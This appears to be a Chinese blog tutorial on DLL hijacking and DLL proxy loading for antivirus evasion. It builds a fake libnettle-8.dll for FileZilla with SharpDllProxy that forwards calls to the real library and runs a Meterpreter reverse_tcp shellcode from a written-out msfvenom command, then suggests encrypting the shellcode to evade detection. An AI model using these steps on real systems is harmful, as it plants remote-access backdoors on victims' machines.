DLL *** 转发与weiquan

访客4年前 (2021-04-13)黑客文章631

本文首发于“合天网安实验室” 作者：unihac

最近看了一些免杀，这一篇小白文章，大佬绕过。知识按照自己的知识整理和写出来的。

本文涉及知识点实操练习——实验:特征码免杀MYCCL应用(合天网安实验室)

通过本实验的学习掌握特征码免杀技术。

DLL劫持

再Windows 7 版本之后，系统采用了KnowDLLs对DLL进行管理，其位于注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs下，在这个下面的DLL文件会被禁止从exe自身所在的目录下调用，而只能从系统目录(System32)目录下调用。但不是所有的dll都会被写入这个注册表，因此就会产生DLL劫持。

使用msfvenom生成的dll直接秒杀。

SharpDllProxy

听名字大概类似于socks *** 一样。工具来源自：https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/。具体实现还可以参考这篇大佬的博客.

前言

先理解下动态链接库的运行原理。如果应用程序A要使用动态链接库DataFunctions.dll里面的GetFunkyData()函数，就需要加载DataFunctions.dll动态链接库。这个工具就是出于这一点考虑，创建一个名字一模一样的DataFunction.dll动态链接库，他的功能有两个：①做个快捷键，将所有的功能转发到千真万确的动态链接库DataFunctions.dll，这就是名字中proxy的由来；②在这个假冒的DataFunctions.dll里面写入shellcode。附上作者原图：

实验过程

目标程序

花费了些时间搞这实验，例如FileZilla软件，怎么去找这个需要加载的dll呢？如作者说的，把该软件拷贝出去就知道他缺什么了。如下：

那就说明运行改应用程序需要加载该DLL文件，那就针对这个DLL做一个假的libnettle-8.dll。

生成shellcode

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.29 LPORT=4444 -f raw > shell.bin

实验开始

首先下载SharpDllProxy：https://github.com/Flangvik/SharpDllProxy，然后使用visual studio 2019对其进行编译，尽量不要使用其他版本，因为我用了下visual studio 2017各种报错搞了半天没搞出来，也可能环境有问题。

直接使用 vs 打开文件下的SharpDllProxy --》生成解决方案

使用SharpDllProxy.dll生成一个假冒的libnettle-8.dll。将shell.bin和需要被假冒的Dll放到上图的文件中。执行如下命令：.\SharpDllProxy.exe --dll libnettle-8.dll --payload shell.bin

生成的文件包含了一个C文件和一个dll，这个dll文件就是原来的 libnettle-8.dll 文件。

来分析下这个C语言程序，从第9行到494行都是转发DLL的函数，将所有需要运行函数转发原来的DLL，让其进行处理。

到了497行就是我们插入的shellcode的地方。重点代码也就只有这么一点，其实还可以直接把shell.bin这个shellcode写入到该文件，就减少了文件可疑文件数量。这里是按照二进制的方式读入然后使用VirtualAlloc内存操作执行shellcode。到这里就可以自己一顿操作猛如虎，各种免杀姿势用上来，例如换个加载方式，如对shellcode先加密然后解密运行。